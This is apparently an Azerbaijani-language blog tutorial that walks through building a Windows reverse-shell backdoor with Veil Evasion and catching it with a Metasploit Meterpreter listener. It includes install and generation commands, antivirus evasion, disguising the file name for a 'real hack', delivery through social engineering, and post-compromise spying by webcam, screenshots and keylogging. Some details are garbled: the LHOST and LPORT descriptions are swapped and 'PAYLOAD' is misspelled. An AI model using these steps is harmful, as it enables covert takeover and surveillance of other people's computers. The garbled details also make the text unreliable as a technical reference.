Windows üçün virus yaradırıq

Bu yazıda Kali Linux-da Veil alətindən istifadə edərək virus yaratmağın yollarından birinə baxacağıq.

Hamınıza salam, əziz dostlar! Müxtəlif zərərli fayllarla işləmək hakerlərin anlamalı olduğu bir sahədir. Mən artıq müxtəlif əməliyyat sistemləri üçün virus yaratma vasitələri haqqında dəfələrlə danışmışam. Bu yazıda biz zərərli proqramlar mövzusunu araşdırmağa davam edəcəyik və Kali Linux-da (və ya hər hansı digər Linux paylamasında) Veil alətindən istifadə edərək arxa qapı virusu yaratmağın başqa yoluna baxacağıq .

Kali Linux-da Veil ilə Windows Virusunu Necə Yaratmaq olar

Backdoor - istifadəçinin xəbəri olmadan cihazı idarə etmək üçün autentifikasiya və ya şifrələmə tələblərini yan keçmək və kompüterə gizli giriş yaratmaq üçün istifadə edilən bir texnikadır. Bu termin zərərli proqrama tətbiq edildikdə, hakerlər ondan kompüter funksiyalarına gizli şəkildə, məsələn, arxa planda daxil olmaq üçün istifadə edirlər.

Sonra, işə salınması və işləməsi hətta antivirusun aşkar edə bilmədiyi Windows ilə işləyən bir kompüter üçün arxa qapının yaradılması prosesini göstərəcəyəm . Virusu işə saldıqdan sonra mən kompüteri uzaqdan idarə edə bildim, veb-kameradan şəkil çəkə bildim, skrinşot çəkə bildim, klaviaturadan istifadə edə bildim (klaviatura vuruşlarını qeyd etmək) və s.

Virus yaratmaq üçün addımlara baxaq...

1. Linux-da Veil quraşdırın

İlk addım Veil quraşdırmaqdır. Əgər Kali Linux-dan başqa bir paylama istifadə edirsinizsə, o zaman Metasploit-i də quraşdırmalısınız.

• Kali Linux-da Veil-i tez və səssiz quraşdırmaq üçün aşağıdakı əmrdən istifadə edin:

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

2. Pərdə Çərçivəsindən istifadə

• Quraşdırıldıqdan sonra çərçivəni işə salmaq üçün əmrdən istifadə edin:

veil

• Veil çərçivəsi əmrlə göstərilə bilən iki alətdən, Evasion və Ordinance-dən ibarətdir:

list

• Biz Evasion ilə maraqlanırıq, ona görə daxil oluruq:

use 1

2.1 İcra edilə bilən virus faylının yaradılması

Backdoor virusları əks əlaqə yaradır. Hədəf istifadəçi zərərli virus faylını işə saldıqda, kompüter hakerin kompüterinə qoşulmağa çalışır. Bu proses backconnect adlanır. Hücum daxildən gəlir, ona görə də antiviruslar həmişə belə bir hücumu aşkar edə bilmirlər. Bu səbəbdən vebsaytlara qoşulmaq üçün istifadə olunan adi port olan 8080 portunu istifadə etmək daha yaxşıdır.

• Faydalı yüklərin (virusların) siyahısını göstərmək üçün əmrdən istifadə edin:

list

• 15-ci variantdan istifadə edəcəyəm. Bu seçim Meterpreter yükünün proqramlaşdırma dili kimi qolanqdan istifadə edir:

use 15

Virus yaratmaq üçün LPORT və LHOST parametrlərini təyin etməlisiniz.

• LPORT - Hücum edən kompüterin IP ünvanı. IP ünvanınızı tapmaq üçün ifconfig əmrindən istifadə edin.
• LHOST - əlaqə üçün port. Mən 8080-dən istifadə edəcəyəm, amma başqa port seçə bilərsiniz.

set LHOST ваш_ip
set LPORT 8080

Antivirusun imza analizi, xüsusi bir virusun imza xarakteristikası olan unikal bayt ardıcıllığı üçün faylların axtarışına əsaslanır. Hər yeni virus üçün onun imzası müəyyən edilir. Alınan məlumatlar bütün antivirusların işlədiyi virus imzaları bazasına yerləşdirilir. Zərərli faylınızın imzası bu verilənlər bazasında varsa, antivirus faylınızı şübhəli kimi qeyd edəcək. Buna görə də, Veil-in yenilənmiş versiyasından istifadə etmək tövsiyə olunur, çünki yenilənmiş versiya virusu maskalamaq üçün daha yaxşı iş görəcək və antivirusdan yan keçməyə imkan verəcəkdir.

• Antivirusdan yan keçmək üçün istifadə etdiyim aşağıdakı parametrlər. Bu məcburi hissə deyil, lakin əlavə zərərli proqram qorunması zərər verməyəcək:

• Virus yaratmaq üçün əmri yerinə yetirin:

generate

• Fayla ad verin. Mən buna backdoor_8080 adını verdim, amma əsl hackdə şübhə doğurmamaq üçün başqa ad qoymalısınız:

• Yaradılmış virus qovluqda saxlanacaq:

var/lib/veil/output/compiled/

2.2 Uzaq kompüterə qoşulma

• İndi Metasploit çərçivəsinə başlayaq. Metasploit-i işə salmaq üçün terminalı açın və əmri yerinə yetirin:

msfconsole

• Çox/işləyici modulunu seçin multi/handler::

use exploit/multi/handler

• Parametrləri göstərək:

show options

• Parametrləri tələblərimizə uyğun dəyişək. Aşağıdakı əmrləri yerinə yetirək:

set PAYLAOD windows/meterpreter/reverse_https
set LHOST IP
set LPORT 8080
show options

IP — virusun yaradılması zamanı istifadə etdiyimiz kompüterimizin IP ünvanıdır.

• Dinləyiciyə başlayırıq:

exploit

2.3 Virusun hədəf kompüterə çatdırılması

İndi siz virusu hədəf kompüterə göndərə bilərsiniz. Əgər cihaza fiziki girişiniz yoxdursa, o zaman sosial mühəndislik üsullarını tətbiq edə bilərsiniz.

2.4 Windows-da virusun yoxlanması

Virusu Windows kompüterində işə salırıq (mənim virusum backdoor_8080.exe faylı).

• Metasploit-ə qayıdırıq və metepreter seansının açıq olduğunu görürük. Beləliklə, biz uzaq kompüteri sındırdıq və onunla əlaqə qura bilərik:

• Meterpreter sessiyası yuxarıda göstərilən kimi görünəcək. Komanda yardımı üçün yazın:

help

İndi siz istifadəçi imtiyazlarını dəyişə, faylları yükləyə və yükləyə, icra olunan faylı xidmət kimi işlədə, ekran görüntüləri çəkə, düymə vuruşlarını saxlaya və s. edə bilərsiniz.

Bu üsul yerli şəbəkədə istifadə edilə bilər. Əgər siz onu uzaqdan istifadə etmək istəyirsinizsə, o zaman Ngrok istifadə edərək uzaqdan əlaqə qurmalısınız.

Hörmətlə SADİG ALİYEV